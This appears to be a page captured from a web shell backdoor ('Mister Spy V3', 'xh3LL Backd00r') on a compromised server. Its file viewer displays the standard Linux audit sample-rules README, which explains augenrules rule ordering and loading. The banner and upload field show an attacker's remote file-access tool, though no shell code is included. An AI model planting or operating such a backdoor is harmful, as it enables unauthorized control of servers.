Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /usr/share/audit/sample-rules/
Upload File :
Current File : //usr/share/audit/sample-rules/README-rules

This group of rules are meant to be used with the augenrules program.
The augenrules program expects rules to be located in /etc/audit/rules.d/
The rules will get processed in a specific order based on their natural
sort order. To make things easier to use, the files in this directory are
organized into groups with the following meanings:

10 - Kernel and auditctl configuration
20 - Rules that could match general rules but we want a different match
30 - Main rules
40 - Optional rules
50 - Server Specific rules
70 - System local rules
90 - Finalize (immutable)

There is one set of rules, 31-privileged.rules, that should be regenerated.
There is a script in the comments of that file. You can uncomment the commands
and run the script and then rename the resulting file.

The rules are not meant to be used all at once. They are pieces of a policy
that should be thought out and individual files copied to /etc/audit/rules.d/
For example, if you wanted to set a system up in the STIG configuration, copy
rules 10-base-config, 30-stig, 31-privileged, and 99-finalize. You can add
more if you like. Also, not all arches have the same syscalls. It is expected
that the rules be fine tuned for the arch they are deployed on. For example,
aarch64 does not have the open syscall. It should just be deleted from the
rules.

Once you have the rules in the rules.d directory, you can load them by running
augenrules --load


Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat